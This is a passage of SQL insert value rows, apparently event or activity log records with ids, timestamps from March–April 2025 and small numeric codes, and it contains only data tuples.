(16297, '2025-03-18 14:28:44', 1, 2062, 0, 1, 1),
(16298, '2025-03-18 15:10:01', 1, 2060, 0, 1, 1),
(16299, '2025-03-18 19:42:08', 1, 2061, 0, 1, 1),
(16300, '2025-03-19 04:43:07', 1, 2058, 0, 1, 1),
(16301, '2025-03-19 04:52:39', 1, 2061, 0, 1, 1),
(16302, '2025-03-19 05:03:31', 1, 2058, 0, 1, 1),
(16303, '2025-03-19 05:53:33', 1, 2061, 0, 1, 1),
(16304, '2025-03-19 13:31:35', 1, 2059, 0, 1, 1),
(16305, '2025-03-19 15:01:35', 1, 2062, 0, 1, 1),
(16306, '2025-03-20 02:04:29', 1, 2061, 0, 1, 1),
(16307, '2025-03-20 06:51:45', 1, 2062, 0, 1, 1),
(16308, '2025-03-20 07:57:30', 1, 2055, 0, 1, 1),
(16309, '2025-03-20 11:27:39', 1, 2059, 0, 1, 1),
(16310, '2025-03-20 14:37:25', 1, 2062, 0, 1, 1),
(16311, '2025-03-20 14:50:31', 1, 2053, 0, 1, 1),
(16312, '2025-03-20 15:58:00', 1, 2062, 0, 1, 1),
(16313, '2025-03-21 06:15:37', 1, 2054, 0, 1, 1),
(16314, '2025-03-21 13:18:45', 1, 2062, 0, 1, 1),
(16315, '2025-03-21 14:29:23', 1, 2062, 0, 1, 1),
(16316, '2025-03-21 14:31:27', 1, 2064, 0, 1, 1),
(16317, '2025-03-21 15:43:49', 1, 2063, 0, 1, 1),
(16318, '2025-03-21 19:02:36', 1, 2063, 0, 1, 1),
(16319, '2025-03-22 01:26:44', 1, 2060, 0, 1, 1),
(16320, '2025-03-22 01:27:03', 1, 2064, 0, 1, 1),
(16321, '2025-03-22 08:49:14', 1, 2064, 0, 1, 1),
(16322, '2025-03-22 08:55:37', 1, 2062, 0, 1, 1),
(16323, '2025-03-22 11:33:44', 1, 2063, 0, 1, 1),
(16324, '2025-03-22 11:53:00', 1, 2059, 0, 1, 1),
(16325, '2025-03-22 14:20:22', 1, 2062, 0, 1, 1),
(16326, '2025-03-22 17:23:37', 1, 2064, 0, 1, 1),
(16327, '2025-03-22 19:08:04', 1, 2059, 0, 1, 1),
(16328, '2025-03-22 20:43:11', 1, 2058, 0, 1, 1),
(16329, '2025-03-23 00:07:51', 1, 2064, 0, 1, 1),
(16330, '2025-03-23 00:18:19', 1, 2062, 0, 1, 1),
(16331, '2025-03-23 00:36:48', 1, 2058, 0, 1, 1),
(16332, '2025-03-23 01:10:33', 1, 2060, 0, 1, 1),
(16333, '2025-03-23 02:19:52', 1, 2054, 0, 1, 1),
(16334, '2025-03-23 02:33:54', 1, 2061, 0, 1, 1),
(16335, '2025-03-23 08:14:26', 1, 2058, 0, 1, 1),
(16336, '2025-03-23 10:57:42', 1, 2058, 0, 1, 1),
(16337, '2025-03-23 11:57:03', 1, 2061, 0, 1, 1),
(16338, '2025-03-23 11:57:38', 1, 2058, 0, 1, 1),
(16339, '2025-03-23 15:51:20', 1, 2062, 0, 1, 1),
(16340, '2025-03-23 20:41:47', 1, 2053, 0, 1, 1),
(16341, '2025-03-24 09:22:00', 1, 2063, 0, 1, 1),
(16342, '2025-03-24 09:22:10', 1, 2059, 0, 1, 1),
(16343, '2025-03-24 09:23:04', 1, 2054, 0, 1, 1),
(16344, '2025-03-24 09:29:16', 1, 2061, 0, 1, 1),
(16345, '2025-03-24 09:29:18', 1, 2060, 0, 1, 1),
(16346, '2025-03-24 10:12:57', 1, 2063, 0, 1, 1),
(16347, '2025-03-24 12:27:28', 1, 2058, 0, 1, 1),
(16348, '2025-03-24 16:05:18', 1, 2062, 0, 1, 1),
(16349, '2025-03-24 18:58:51', 1, 2062, 0, 1, 1),
(16350, '2025-03-25 03:43:40', 1, 2063, 0, 1, 1),
(16351, '2025-03-25 11:33:11', 3, 2058, 3043, 1, 1),
(16352, '2025-03-25 15:21:33', 1, 2062, 0, 1, 1),
(16353, '2025-03-26 00:27:08', 1, 2053, 0, 1, 1),
(16354, '2025-03-26 02:01:31', 1, 2064, 0, 1, 1),
(16355, '2025-03-26 05:02:48', 1, 2055, 0, 1, 1),
(16356, '2025-03-26 05:02:49', 1, 2058, 0, 1, 1),
(16357, '2025-03-26 05:19:01', 1, 2061, 0, 1, 1),
(16358, '2025-03-26 05:44:33', 1, 2054, 0, 1, 1),
(16359, '2025-03-26 09:13:59', 1, 2059, 0, 1, 1),
(16360, '2025-03-26 09:29:22', 1, 2059, 0, 1, 1),
(16361, '2025-03-26 10:25:40', 1, 2059, 0, 1, 1),
(16362, '2025-03-26 14:10:56', 1, 2059, 0, 1, 1),
(16363, '2025-03-26 14:31:18', 1, 2054, 0, 1, 1),
(16364, '2025-03-26 15:18:34', 1, 2059, 0, 1, 1),
(16365, '2025-03-26 15:55:35', 1, 2062, 0, 1, 1),
(16366, '2025-03-26 19:28:50', 1, 2060, 0, 1, 1),
(16367, '2025-03-26 19:29:24', 1, 2059, 0, 1, 1),
(16368, '2025-03-26 19:30:11', 1, 2061, 0, 1, 1),
(16369, '2025-03-26 19:31:22', 1, 2063, 0, 1, 1),
(16370, '2025-03-26 21:39:58', 1, 2054, 0, 1, 1),
(16371, '2025-03-27 05:54:51', 1, 2058, 0, 1, 1),
(16372, '2025-03-27 06:50:50', 1, 2055, 0, 1, 1),
(16373, '2025-03-27 14:15:26', 1, 2063, 0, 1, 1),
(16374, '2025-03-27 14:59:45', 1, 2062, 0, 1, 1),
(16375, '2025-03-27 15:47:51', 1, 2062, 0, 1, 1),
(16376, '2025-03-27 16:08:29', 1, 2058, 0, 1, 1),
(16377, '2025-03-27 22:19:26', 1, 2064, 0, 1, 1),
(16378, '2025-03-28 02:30:04', 1, 2064, 0, 1, 1),
(16379, '2025-03-28 02:30:04', 1, 2064, 0, 1, 1),
(16380, '2025-03-28 02:30:04', 1, 2064, 0, 1, 1),
(16381, '2025-03-28 02:30:21', 1, 2061, 0, 1, 1),
(16382, '2025-03-28 02:30:30', 1, 2062, 0, 1, 1),
(16383, '2025-03-28 02:30:31', 1, 2063, 0, 1, 1),
(16384, '2025-03-28 02:30:33', 1, 2059, 0, 1, 1),
(16385, '2025-03-28 02:30:34', 1, 2058, 0, 1, 1),
(16386, '2025-03-28 02:30:40', 1, 2055, 0, 1, 1),
(16387, '2025-03-28 02:30:43', 1, 2060, 0, 1, 1),
(16388, '2025-03-28 02:30:44', 1, 2054, 0, 1, 1),
(16389, '2025-03-28 02:31:01', 1, 2053, 0, 1, 1),
(16390, '2025-03-28 06:52:59', 1, 2063, 0, 1, 1),
(16391, '2025-03-28 07:01:50', 1, 2061, 0, 1, 1),
(16392, '2025-03-28 15:21:00', 1, 2062, 0, 1, 1),
(16393, '2025-03-28 15:37:47', 1, 2064, 0, 1, 1),
(16394, '2025-03-28 15:37:51', 1, 2063, 0, 1, 1),
(16395, '2025-03-28 15:37:59', 1, 2062, 0, 1, 1),
(16396, '2025-03-28 15:38:03', 1, 2061, 0, 1, 1),
(16397, '2025-03-28 15:38:07', 1, 2060, 0, 1, 1),
(16398, '2025-03-28 15:38:11', 1, 2059, 0, 1, 1),
(16399, '2025-03-28 15:38:15', 1, 2058, 0, 1, 1),
(16400, '2025-03-28 15:38:18', 1, 2055, 0, 1, 1),
(16401, '2025-03-28 15:38:25', 1, 2054, 0, 1, 1),
(16402, '2025-03-28 19:57:52', 1, 2061, 0, 1, 1),
(16403, '2025-03-28 20:42:50', 1, 2064, 0, 1, 1),
(16404, '2025-03-28 21:42:37', 1, 2061, 0, 1, 1),
(16405, '2025-03-28 22:19:29', 1, 2061, 0, 1, 1),
(16406, '2025-03-28 22:36:33', 1, 2059, 0, 1, 1),
(16407, '2025-03-28 22:38:38', 1, 2054, 0, 1, 1),
(16408, '2025-03-28 22:39:21', 1, 2060, 0, 1, 1),
(16409, '2025-03-28 22:39:32', 1, 2061, 0, 1, 1),
(16410, '2025-03-28 22:41:09', 1, 2063, 0, 1, 1),
(16411, '2025-03-29 02:24:17', 1, 2062, 0, 1, 1),
(16412, '2025-03-29 02:24:28', 1, 2059, 0, 1, 1),
(16413, '2025-03-29 02:24:33', 1, 2061, 0, 1, 1),
(16414, '2025-03-29 02:24:40', 1, 2063, 0, 1, 1),
(16415, '2025-03-29 03:27:01', 1, 2059, 0, 1, 1),
(16416, '2025-03-29 13:06:56', 1, 2061, 0, 1, 1),
(16417, '2025-03-29 13:45:30', 1, 2061, 0, 1, 1),
(16418, '2025-03-29 15:43:34', 1, 2062, 0, 1, 1),
(16419, '2025-03-29 18:31:55', 1, 2054, 0, 1, 1),
(16420, '2025-03-29 18:32:01', 1, 2058, 0, 1, 1),
(16421, '2025-03-29 18:32:11', 1, 2055, 0, 1, 1),
(16422, '2025-03-29 18:32:14', 1, 2060, 0, 1, 1),
(16423, '2025-03-29 18:32:22', 1, 2062, 0, 1, 1),
(16424, '2025-03-29 18:32:24', 1, 2061, 0, 1, 1),
(16425, '2025-03-29 18:32:26', 1, 2063, 0, 1, 1),
(16426, '2025-03-29 18:32:28', 1, 2059, 0, 1, 1),
(16427, '2025-03-29 18:32:47', 1, 2064, 0, 1, 1),
(16428, '2025-03-29 22:13:24', 1, 2063, 0, 1, 1),
(16429, '2025-03-30 02:01:29', 1, 2054, 0, 1, 1),
(16430, '2025-03-30 03:37:59', 1, 2062, 0, 1, 1),
(16431, '2025-03-30 05:24:39', 1, 2055, 0, 1, 1),
(16432, '2025-03-30 05:28:11', 1, 2060, 0, 1, 1),
(16433, '2025-03-30 07:00:27', 1, 2054, 0, 1, 1),
(16434, '2025-03-30 07:00:28', 1, 2054, 0, 1, 1),
(16435, '2025-03-30 07:00:32', 4, 2054, 3050, 1, 1),
(16436, '2025-03-30 07:39:47', 1, 2054, 0, 1, 1),
(16437, '2025-03-30 07:39:48', 1, 2054, 0, 1, 1),
(16438, '2025-03-30 07:39:49', 4, 2054, 3051, 1, 1),
(16439, '2025-03-30 07:43:19', 1, 2054, 0, 1, 1),
(16440, '2025-03-30 07:43:20', 1, 2054, 0, 1, 1),
(16441, '2025-03-30 07:43:21', 4, 2054, 3052, 1, 1),
(16442, '2025-03-30 07:44:48', 1, 2054, 0, 1, 1),
(16443, '2025-03-30 07:44:49', 1, 2054, 0, 1, 1),
(16444, '2025-03-30 07:44:50', 4, 2054, 3053, 1, 1),
(16445, '2025-03-30 07:47:53', 1, 2054, 0, 1, 1),
(16446, '2025-03-30 07:47:55', 1, 2054, 0, 1, 1),
(16447, '2025-03-30 07:47:56', 4, 2054, 3054, 1, 1),
(16448, '2025-03-30 07:49:27', 1, 2054, 0, 1, 1),
(16449, '2025-03-30 07:49:28', 1, 2054, 0, 1, 1),
(16450, '2025-03-30 07:49:29', 4, 2054, 3055, 1, 1),
(16451, '2025-03-30 07:51:16', 1, 2054, 0, 1, 1),
(16452, '2025-03-30 07:51:17', 1, 2054, 0, 1, 1),
(16453, '2025-03-30 07:51:18', 4, 2054, 3056, 1, 1),
(16454, '2025-03-30 07:52:43', 1, 2054, 0, 1, 1),
(16455, '2025-03-30 07:52:44', 1, 2054, 0, 1, 1),
(16456, '2025-03-30 07:52:45', 4, 2054, 3057, 1, 1),
(16457, '2025-03-30 07:54:43', 1, 2054, 0, 1, 1),
(16458, '2025-03-30 07:54:44', 1, 2054, 0, 1, 1),
(16459, '2025-03-30 07:54:45', 4, 2054, 3058, 1, 1),
(16460, '2025-03-30 07:58:49', 1, 2054, 0, 1, 1),
(16461, '2025-03-30 07:58:50', 1, 2054, 0, 1, 1),
(16462, '2025-03-30 07:58:51', 4, 2054, 3059, 1, 1),
(16463, '2025-03-30 10:11:40', 1, 2055, 0, 1, 1),
(16464, '2025-03-30 11:22:41', 1, 2059, 0, 1, 1),
(16465, '2025-03-30 13:40:09', 1, 2054, 0, 1, 1),
(16466, '2025-03-30 13:48:24', 1, 2054, 0, 1, 1),
(16467, '2025-03-30 15:41:27', 1, 2062, 0, 1, 1),
(16468, '2025-03-30 16:58:21', 1, 2064, 0, 1, 1),
(16469, '2025-03-30 21:51:06', 1, 2060, 0, 1, 1),
(16470, '2025-03-30 22:24:05', 1, 2060, 0, 1, 1),
(16471, '2025-03-30 22:25:33', 1, 2059, 0, 1, 1),
(16472, '2025-03-30 23:23:18', 1, 2054, 0, 1, 1),
(16473, '2025-03-30 23:23:23', 1, 2061, 0, 1, 1),
(16474, '2025-03-30 23:24:13', 1, 2063, 0, 1, 1),
(16475, '2025-03-31 02:55:18', 1, 2061, 0, 1, 1),
(16476, '2025-03-31 06:46:57', 1, 2063, 0, 1, 1),
(16477, '2025-03-31 06:46:59', 1, 2058, 0, 1, 1),
(16478, '2025-03-31 07:24:16', 1, 2054, 0, 1, 1),
(16479, '2025-03-31 08:27:51', 1, 2062, 0, 1, 1),
(16480, '2025-03-31 11:27:07', 1, 2055, 0, 1, 1),
(16481, '2025-03-31 12:29:30', 1, 2064, 0, 1, 1),
(16482, '2025-03-31 15:33:17', 1, 2062, 0, 1, 1),
(16483, '2025-03-31 21:23:27', 1, 2053, 0, 1, 1),
(16484, '2025-03-31 22:19:11', 1, 2062, 0, 1, 1),
(16485, '2025-03-31 22:56:48', 1, 2061, 0, 1, 1),
(16486, '2025-04-01 01:22:28', 1, 2062, 0, 1, 1),
(16487, '2025-04-01 02:54:16', 1, 2061, 0, 1, 1),
(16488, '2025-04-01 04:25:00', 1, 2063, 0, 1, 1),
(16489, '2025-04-01 07:12:26', 1, 2064, 0, 1, 1),
(16490, '2025-04-01 07:12:26', 1, 2060, 0, 1, 1),
(16491, '2025-04-01 07:12:26', 1, 2059, 0, 1, 1),
(16492, '2025-04-01 07:12:46', 1, 2064, 0, 1, 1),
(16493, '2025-04-01 07:12:47', 1, 2064, 0, 1, 1),
(16494, '2025-04-01 07:12:54', 1, 2058, 0, 1, 1),
(16495, '2025-04-01 07:12:55', 1, 2063, 0, 1, 1),
(16496, '2025-04-01 07:12:56', 1, 2062, 0, 1, 1),
(16497, '2025-04-01 07:12:59', 1, 2061, 0, 1, 1),
(16498, '2025-04-01 07:13:04', 1, 2055, 0, 1, 1),
(16499, '2025-04-01 07:13:07', 1, 2054, 0, 1, 1),
(16500, '2025-04-01 10:08:14', 1, 2060, 0, 1, 1),
(16501, '2025-04-01 10:08:16', 1, 2064, 0, 1, 1),
(16502, '2025-04-01 10:08:17', 1, 2059, 0, 1, 1),
(16503, '2025-04-01 10:08:35', 1, 2064, 0, 1, 1),
(16504, '2025-04-01 10:08:36', 1, 2064, 0, 1, 1),
(16505, '2025-04-01 10:08:44', 1, 2061, 0, 1, 1),
(16506, '2025-04-01 10:08:45', 1, 2058, 0, 1, 1),
(16507, '2025-04-01 10:08:47', 1, 2063, 0, 1, 1),
(16508, '2025-04-01 10:08:47', 1, 2062, 0, 1, 1),
(16509, '2025-04-01 10:08:56', 1, 2055, 0, 1, 1),
(16510, '2025-04-01 10:08:57', 1, 2054, 0, 1, 1),
(16511, '2025-04-01 13:55:36', 1, 2061, 0, 1, 1),
(16512, '2025-04-01 13:59:57', 1, 2058, 0, 1, 1),
(16513, '2025-04-01 14:05:47', 1, 2055, 0, 1, 1),
(16514, '2025-04-01 14:49:46', 1, 2061, 0, 1, 1),
(16515, '2025-04-01 15:47:26', 1, 2062, 0, 1, 1),
(16516, '2025-04-01 16:26:52', 1, 2062, 0, 1, 1),
(16517, '2025-04-01 17:26:52', 1, 2060, 0, 1, 1),
(16518, '2025-04-01 18:23:03', 1, 2064, 0, 1, 1),
(16519, '2025-04-01 18:34:30', 1, 2064, 0, 1, 1),
(16520, '2025-04-01 22:12:08', 1, 2058, 0, 1, 1),
(16521, '2025-04-01 22:13:46', 1, 2053, 0, 1, 1),
(16522, '2025-04-01 22:53:37', 1, 2054, 0, 1, 1),
(16523, '2025-04-02 00:10:57', 1, 2064, 0, 1, 1),
(16524, '2025-04-02 02:08:07', 1, 2063, 0, 1, 1),
(16525, '2025-04-02 02:13:16', 1, 2059, 0, 1, 1),
(16526, '2025-04-02 06:33:06', 1, 2060, 0, 1, 1),
(16527, '2025-04-02 06:34:12', 1, 2059, 0, 1, 1),
(16528, '2025-04-02 06:34:59', 1, 2054, 0, 1, 1),
(16529, '2025-04-02 06:35:13', 1, 2061, 0, 1, 1),
(16530, '2025-04-02 06:41:28', 1, 2063, 0, 1, 1),
(16531, '2025-04-02 10:47:30', 1, 2054, 0, 1, 1),
(16532, '2025-04-02 10:59:50', 1, 2062, 0, 1, 1),
(16533, '2025-04-02 11:09:41', 1, 2060, 0, 1, 1),
(16534, '2025-04-02 15:47:06', 1, 2062, 0, 1, 1),
(16535, '2025-04-02 20:15:41', 1, 2054, 0, 1, 1),
(16536, '2025-04-03 08:16:51', 1, 2059, 0, 1, 1),
(16537, '2025-04-03 08:27:55', 1, 2053, 0, 1, 1),
(16538, '2025-04-03 09:45:03', 1, 2061, 0, 1, 1),
(16539, '2025-04-03 11:02:01', 1, 2058, 0, 1, 1),
(16540, '2025-04-03 11:02:34', 1, 2061, 0, 1, 1),
(16541, '2025-04-03 11:02:57', 1, 2059, 0, 1, 1),
(16542, '2025-04-03 11:03:14', 1, 2060, 0, 1, 1),
(16543, '2025-04-03 11:03:35', 1, 2062, 0, 1, 1),
(16544, '2025-04-03 11:03:51', 1, 2063, 0, 1, 1),
(16545, '2025-04-03 11:04:06', 1, 2064, 0, 1, 1),
(16546, '2025-04-03 11:06:07', 1, 2055, 0, 1, 1),
(16547, '2025-04-03 11:06:19', 1, 2054, 0, 1, 1),
(16548, '2025-04-03 11:06:29', 1, 2053, 0, 1, 1),
(16549, '2025-04-03 11:58:19', 1, 2058, 0, 1, 1),
(16550, '2025-04-03 11:58:31', 1, 2061, 0, 1, 1),
(16551, '2025-04-03 11:58:48', 1, 2059, 0, 1, 1),
(16552, '2025-04-03 11:58:59', 1, 2060, 0, 1, 1),
(16553, '2025-04-03 11:59:12', 1, 2062, 0, 1, 1),
(16554, '2025-04-03 11:59:24', 1, 2063, 0, 1, 1),
(16555, '2025-04-03 11:59:36', 1, 2064, 0, 1, 1),
(16556, '2025-04-03 12:01:26', 1, 2055, 0, 1, 1),
(16557, '2025-04-03 12:01:37', 1, 2054, 0, 1, 1),
(16558, '2025-04-03 12:01:50', 1, 2053, 0, 1, 1),
(16559, '2025-04-03 15:36:41', 1, 2062, 0, 1, 1),
(16560, '2025-04-03 18:02:49', 1, 2058, 0, 1, 1),
(16561, '2025-04-03 19:43:38', 1, 2054, 0, 1, 1),
(16562, '2025-04-03 19:43:41', 1, 2060, 0, 1, 1),
(16563, '2025-04-04 01:13:12', 1, 2061, 0, 1, 1),
(16564, '2025-04-04 02:30:20', 1, 2059, 0, 1, 1),
(16565, '2025-04-04 03:03:11', 1, 2060, 0, 1, 1),
(16566, '2025-04-04 06:43:08', 1, 2060, 0, 1, 1),
(16567, '2025-04-04 06:43:48', 1, 2059, 0, 1, 1),
(16568, '2025-04-04 06:45:11', 1, 2054, 0, 1, 1),
(16569, '2025-04-04 06:45:15', 1, 2061, 0, 1, 1),
(16570, '2025-04-04 06:45:39', 1, 2064, 0, 1, 1),
(16571, '2025-04-04 06:52:49', 1, 2063, 0, 1, 1),
(16572, '2025-04-04 15:27:49', 1, 2058, 0, 1, 1),
(16573, '2025-04-04 15:38:54', 1, 2062, 0, 1, 1),
(16574, '2025-04-04 17:54:15', 1, 2058, 0, 1, 1),
(16575, '2025-04-04 20:36:29', 1, 2058, 0, 1, 1),
(16576, '2025-04-04 21:07:08', 1, 2062, 0, 1, 1),
(16577, '2025-04-05 03:43:21', 1, 2055, 0, 1, 1),
(16578, '2025-04-05 03:43:24', 1, 2064, 0, 1, 1),
(16579, '2025-04-05 03:43:26', 1, 2063, 0, 1, 1),
(16580, '2025-04-05 03:43:27', 1, 2062, 0, 1, 1),
(16581, '2025-04-05 03:43:29', 1, 2060, 0, 1, 1),
(16582, '2025-04-05 06:29:03', 1, 2054, 0, 1, 1),
(16583, '2025-04-05 08:57:56', 1, 2062, 0, 1, 1),
(16584, '2025-04-05 12:30:24', 1, 2058, 0, 1, 1),
(16585, '2025-04-05 12:33:00', 1, 2055, 0, 1, 1),
(16586, '2025-04-05 12:33:00', 1, 2064, 0, 1, 1),
(16587, '2025-04-05 12:33:00', 1, 2064, 0, 1, 1),
(16588, '2025-04-05 12:33:00', 1, 2059, 0, 1, 1),
(16589, '2025-04-05 12:33:00', 1, 2054, 0, 1, 1),
(16590, '2025-04-05 12:33:22', 1, 2064, 0, 1, 1),
(16591, '2025-04-05 12:33:30', 1, 2061, 0, 1, 1),
(16592, '2025-04-05 12:33:31', 1, 2058, 0, 1, 1),
(16593, '2025-04-05 12:33:33', 1, 2063, 0, 1, 1),
(16594, '2025-04-05 12:33:34', 1, 2062, 0, 1, 1),
(16595, '2025-04-05 12:33:42', 1, 2060, 0, 1, 1),
(16596, '2025-04-05 12:33:52', 1, 2053, 0, 1, 1),
(16597, '2025-04-05 15:33:23', 1, 2062, 0, 1, 1),
(16598, '2025-04-05 17:01:31', 1, 2061, 0, 1, 1),
(16599, '2025-04-05 17:12:03', 1, 2058, 0, 1, 1),
(16600, '2025-04-05 18:05:08', 1, 2061, 0, 1, 1),
(16601, '2025-04-06 05:34:38', 1, 2055, 0, 1, 1),
(16602, '2025-04-06 06:27:50', 1, 2055, 0, 1, 1),
(16603, '2025-04-06 13:48:07', 1, 2060, 0, 1, 1),
(16604, '2025-04-06 13:49:25', 1, 2059, 0, 1, 1),
(16605, '2025-04-06 13:50:10', 1, 2054, 0, 1, 1),
(16606, '2025-04-06 13:51:10', 1, 2061, 0, 1, 1),
(16607, '2025-04-06 13:58:07', 1, 2063, 0, 1, 1),
(16608, '2025-04-06 14:08:53', 1, 2055, 0, 1, 1),
(16609, '2025-04-06 15:38:52', 1, 2062, 0, 1, 1),
(16610, '2025-04-06 22:41:36', 1, 2054, 0, 1, 1),
(16611, '2025-04-06 23:34:36', 1, 2064, 0, 1, 1),
(16612, '2025-04-06 23:57:41', 1, 2064, 0, 1, 1),
(16613, '2025-04-07 00:03:08', 1, 2062, 0, 1, 1),
(16614, '2025-04-07 00:29:46', 1, 2059, 0, 1, 1),
(16615, '2025-04-07 07:03:36', 1, 2064, 0, 1, 1),
(16616, '2025-04-07 07:36:02', 1, 2063, 0, 1, 1),
(16617, '2025-04-07 07:49:56', 1, 2059, 0, 1, 1),
(16618, '2025-04-07 08:13:45', 1, 2064, 0, 1, 1),
(16619, '2025-04-07 08:18:32', 1, 2060, 0, 1, 1),
(16620, '2025-04-07 09:19:58', 1, 2060, 0, 1, 1),
(16621, '2025-04-07 10:48:39', 1, 2061, 0, 1, 1),
(16622, '2025-04-07 12:32:19', 1, 2064, 0, 1, 1),
(16623, '2025-04-07 13:22:15', 1, 2059, 0, 1, 1),
(16624, '2025-04-07 13:47:34', 1, 2059, 0, 1, 1),
(16625, '2025-04-07 14:41:33', 1, 2062, 0, 1, 1),
(16626, '2025-04-07 20:28:07', 1, 2062, 0, 1, 1),
(16627, '2025-04-08 01:53:00', 1, 2053, 0, 1, 1),
(16628, '2025-04-08 07:27:05', 1, 2060, 0, 1, 1),
(16629, '2025-04-08 09:19:57', 1, 2054, 0, 1, 1),
(16630, '2025-04-08 09:20:00', 1, 2055, 0, 1, 1),
(16631, '2025-04-08 09:20:15', 1, 2064, 0, 1, 1),
(16632, '2025-04-08 09:20:30', 1, 2063, 0, 1, 1),
(16633, '2025-04-08 09:20:34', 1, 2062, 0, 1, 1),
(16634, '2025-04-08 09:20:36', 1, 2060, 0, 1, 1),
(16635, '2025-04-08 09:20:38', 1, 2059, 0, 1, 1),
(16636, '2025-04-08 09:20:40', 1, 2061, 0, 1, 1),
(16637, '2025-04-08 09:20:42', 1, 2058, 0, 1, 1),
(16638, '2025-04-08 13:15:00', 1, 2054, 0, 1, 1),
(16639, '2025-04-08 14:57:24', 1, 2060, 0, 1, 1),
(16640, '2025-04-08 15:08:30', 1, 2059, 0, 1, 1),
(16641, '2025-04-08 15:09:20', 1, 2061, 0, 1, 1),
(16642, '2025-04-08 15:15:59', 1, 2063, 0, 1, 1),
(16643, '2025-04-08 15:53:18', 1, 2062, 0, 1, 1),
(16644, '2025-04-09 01:36:08', 1, 2059, 0, 1, 1),
(16645, '2025-04-09 01:47:59', 1, 2055, 0, 1, 1),
(16646, '2025-04-09 02:25:37', 1, 2064, 0, 1, 1),
(16647, '2025-04-09 03:54:05', 1, 2058, 0, 1, 1),
(16648, '2025-04-09 04:24:59', 1, 2064, 0, 1, 1),
(16649, '2025-04-09 07:32:29', 1, 2055, 0, 1, 1),
(16650, '2025-04-09 07:36:15', 1, 2053, 0, 1, 1),
(16651, '2025-04-09 09:43:47', 1, 2060, 0, 1, 1),
(16652, '2025-04-09 09:53:31', 1, 2063, 0, 1, 1),
(16653, '2025-04-09 10:04:50', 1, 2061, 0, 1, 1),
(16654, '2025-04-09 10:25:16', 1, 2062, 0, 1, 1),
(16655, '2025-04-09 10:34:11', 1, 2054, 0, 1, 1),
(16656, '2025-04-09 10:55:37', 1, 2063, 0, 1, 1),
(16657, '2025-04-09 13:57:07', 1, 2064, 0, 1, 1),
(16658, '2025-04-09 15:38:24', 1, 2062, 0, 1, 1),
(16659, '2025-04-09 17:32:05', 1, 2063, 0, 1, 1),
(16660, '2025-04-09 19:36:18', 1, 2063, 0, 1, 1),
(16661, '2025-04-09 20:39:17', 1, 2053, 0, 1, 1),
(16662, '2025-04-09 22:18:38', 1, 2059, 0, 1, 1),
(16663, '2025-04-09 22:18:40', 1, 2064, 0, 1, 1),
(16664, '2025-04-09 22:18:40', 1, 2064, 0, 1, 1),
(16665, '2025-04-09 22:18:40', 1, 2058, 0, 1, 1),
(16666, '2025-04-09 22:18:40', 1, 2061, 0, 1, 1),
(16667, '2025-04-09 22:18:40', 1, 2064, 0, 1, 1),
(16668, '2025-04-09 22:19:19', 1, 2060, 0, 1, 1),
(16669, '2025-04-09 22:19:20', 1, 2054, 0, 1, 1),
(16670, '2025-04-09 22:19:21', 1, 2053, 0, 1, 1),
(16671, '2025-04-09 22:19:23', 1, 2062, 0, 1, 1),
(16672, '2025-04-09 22:19:24', 1, 2063, 0, 1, 1),
(16673, '2025-04-09 22:19:26', 1, 2055, 0, 1, 1),
(16674, '2025-04-09 23:12:17', 1, 2064, 0, 1, 1),
(16675, '2025-04-09 23:57:20', 1, 2061, 0, 1, 1),
(16676, '2025-04-09 23:57:23', 1, 2058, 0, 1, 1),
(16677, '2025-04-09 23:57:26', 1, 2059, 0, 1, 1),
(16678, '2025-04-09 23:57:29', 1, 2063, 0, 1, 1),
(16679, '2025-04-09 23:57:33', 1, 2064, 0, 1, 1),
(16680, '2025-04-09 23:57:41', 1, 2055, 0, 1, 1),
(16681, '2025-04-09 23:57:48', 1, 2054, 0, 1, 1),
(16682, '2025-04-09 23:58:28', 1, 2064, 0, 1, 1),
(16683, '2025-04-09 23:58:31', 1, 2064, 0, 1, 1),
(16684, '2025-04-09 23:58:36', 1, 2062, 0, 1, 1),
(16685, '2025-04-09 23:58:49', 1, 2060, 0, 1, 1),
(16686, '2025-04-10 00:08:32', 1, 2060, 0, 1, 1),
(16687, '2025-04-10 03:23:16', 1, 2058, 0, 1, 1),
(16688, '2025-04-10 15:13:15', 1, 2059, 0, 1, 1),
(16689, '2025-04-10 16:04:53', 1, 2062, 0, 1, 1),
(16690, '2025-04-10 18:06:47', 1, 2061, 0, 1, 1),
(16691, '2025-04-10 18:13:33', 1, 2063, 0, 1, 1),
(16692, '2025-04-11 06:22:31', 1, 2061, 0, 1, 1),
(16693, '2025-04-11 06:33:51', 1, 2058, 0, 1, 1),
(16694, '2025-04-11 06:41:19', 1, 2055, 0, 1, 1),
(16695, '2025-04-11 07:13:07', 1, 2053, 0, 1, 1),
(16696, '2025-04-11 07:40:30', 1, 2055, 0, 1, 1),
(16697, '2025-04-11 15:51:10', 1, 2062, 0, 1, 1),
(16698, '2025-04-11 16:18:59', 1, 2061, 0, 1, 1),
(16699, '2025-04-11 16:35:19', 1, 2062, 0, 1, 1),
(16700, '2025-04-11 17:45:39', 1, 2064, 0, 1, 1),
(16701, '2025-04-11 17:58:39', 1, 2064, 0, 1, 1),
(16702, '2025-04-11 18:09:03', 1, 2060, 0, 1, 1),
(16703, '2025-04-11 18:14:13', 1, 2060, 0, 1, 1),
(16704, '2025-04-11 19:33:59', 1, 2062, 0, 1, 1),
(16705, '2025-04-11 19:38:04', 1, 2061, 0, 1, 1),
(16706, '2025-04-11 20:09:12', 1, 2058, 0, 1, 1),
(16707, '2025-04-12 00:10:10', 1, 2058, 0, 1, 1),
(16708, '2025-04-12 03:09:13', 1, 2063, 0, 1, 1),
(16709, '2025-04-12 03:34:06', 1, 2054, 0, 1, 1),
(16710, '2025-04-12 05:13:34', 1, 2063, 0, 1, 1),
(16711, '2025-04-12 05:19:48', 1, 2059, 0, 1, 1),
(16712, '2025-04-12 09:08:00', 1, 2054, 0, 1, 1),
(16713, '2025-04-12 09:30:58', 1, 2064, 0, 1, 1),
(16714, '2025-04-12 10:27:55', 1, 2063, 0, 1, 1),
(16715, '2025-04-12 14:00:10', 1, 2055, 0, 1, 1),
(16716, '2025-04-12 15:36:05', 1, 2062, 0, 1, 1),
(16717, '2025-04-13 01:44:51', 1, 2059, 0, 1, 1),
(16718, '2025-04-13 13:11:35', 1, 2062, 0, 1, 1),
(16719, '2025-04-13 14:25:12', 1, 2055, 0, 1, 1),
(16720, '2025-04-13 15:28:15', 1, 2062, 0, 1, 1),
(16721, '2025-04-14 00:29:48', 1, 2062, 0, 1, 1),
(16722, '2025-04-14 00:56:38', 1, 2059, 0, 1, 1),
(16723, '2025-04-14 07:32:41', 1, 2063, 0, 1, 1),
(16724, '2025-04-14 12:50:21', 1, 2054, 0, 1, 1),
